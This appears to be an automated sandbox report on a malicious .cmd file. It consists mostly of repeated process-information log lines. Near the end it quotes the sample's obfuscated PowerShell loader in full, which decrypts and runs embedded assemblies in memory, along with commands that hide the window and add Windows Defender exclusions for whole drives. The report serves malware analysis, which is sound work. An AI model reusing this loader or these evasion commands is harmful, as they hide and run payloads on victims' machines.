    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exe - Process information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe - Process information set: NOOPENFILEERRORBOX (38 identical entries)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4872
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4860
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2120
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7611
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2144
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7757
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1874
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8162
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1395
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5290
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4490
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: foregroundWindowGot 1766
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1295
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1028
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8188
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1537
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7904
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1602
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7224
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2413
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504 | Thread sleep count: 4872 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7508 | Thread sleep count: 4860 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7660 | Thread sleep time: -18446744073709540s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596 | Thread sleep count: 2120 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7592 | Thread sleep count: 197 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640 | Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800 | Thread sleep time: -5534023222112862s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8000 | Thread sleep time: -7378697629483816s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8156 | Thread sleep time: -1844674407370954s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7000 | Thread sleep count: 5290 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7000 | Thread sleep count: 4490 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7816 | Thread sleep time: -25825441703193356s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7788 | Thread sleep count: 1295 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7764 | Thread sleep count: 1028 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7916 | Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4340 | Thread sleep time: -8301034833169293s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8064 | Thread sleep time: -4611686018427385s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
    Source: powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter
    Source: powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter
    Source: powershell.exe, 0000001E.00000002.2113103855.0000000004A93000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process queried: DebugPort
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\UrgenteNotificationRef.cmd"
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\UrgenteNotificationRef.cmd';$EErt='EntqgNmryqgNmPoiqgNmnqgNmtqgNm'.Replace('qgNm', ''),'CIZQNreIZQNatIZQNeDIZQNecIZQNryIZQNptIZQNorIZQN'.Replace('IZQN', ''),'FrobfNZmbfNZBasbfNZe6bfNZ4SbfNZtrbfNZinbfNZgbfNZ'.Replace('bfNZ', ''),'SplJahjitJahj'.Replace('Jahj', ''),'TriPkHansiPkHfiPkHoriPkHmFiPkHiiPkHnaiPkHlBliPkHoiPkHciPkHkiPkH'.Replace('iPkH', ''),'GetKBQbCurKBQbrenKBQbtPKBQbrKBQbocKBQbessKBQb'.Replace('KBQb', ''),'RyOcoeyOcoadyOcoLyOcoinyOcoesyOco'.Replace('yOco', ''),'LAguzoAguzadAguz'.Replace('Aguz', ''),'EleDcRNmenDcRNtDcRNAtDcRN'.Replace('DcRN', ''),'MalMOMilMOMnlMOMMolMOMdulMOMllMOMelMOM'.Replace('lMOM', ''),'ChaTLERngTLEReETLERxtTLERenTLERsTLERiTLERonTLER'.Replace('TLER', ''),'DeccotGomcotGpcotGrescotGscotG'.Replace('cotG', ''),'CopobqOyobqOTobqOoobqO'.Replace('obqO', ''),'InvClSOokeClSO'.Replace('ClSO', '');powershell -w hidden;function vTzfR($ukwVU){$hHysF=[System.Security.Cryptography.Aes]::Create();$hHysF.Mode=[System.Security.Cryptography.CipherMode]::CBC;$hHysF.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$hHysF.Key=[System.Convert]::($EErt[2])('zavfxzUUXNH4uECQXv0pvDIOSMJD8RFecmPDqbtRg9g=');$hHysF.IV=[System.Convert]::($EErt[2])('mi6yyZbC4Ex2I6/d7FQcGg==');$ovRQV=$hHysF.($EErt[1])();$BaeOu=$ovRQV.($EErt[4])($ukwVU,0,$ukwVU.Length);$ovRQV.Dispose();$hHysF.Dispose();$BaeOu;}function YlNft($ukwVU){$RVhbp=New-Object System.IO.MemoryStream(,$ukwVU);$YhZKJ=New-Object System.IO.MemoryStream;$XoHSZ=New-Object System.IO.Compression.GZipStream($RVhbp,[IO.Compression.CompressionMode]::($EErt[11]));$XoHSZ.($EErt[12])($YhZKJ);$XoHSZ.Dispose();$RVhbp.Dispose();$YhZKJ.Dispose();$YhZKJ.ToArray();}$JBgWB=[System.IO.File]::($EErt[6])([Console]::Title);$vBlXi=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 5).Substring(2))));$kasXC=YlNft (vTzfR ([Convert]::($EErt[2])([System.Linq.Enumerable]::($EErt[8])($JBgWB, 6).Substring(2))));[System.Reflection.Assembly]::($EErt[7])([byte[]]$kasXC).($EErt[0]).($EErt[13])($null,$null);[System.Reflection.Assembly]::($EErt[7])([byte[]]$vBlXi).($EErt[0]).($EErt[13])($null,$null); "
    Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\')
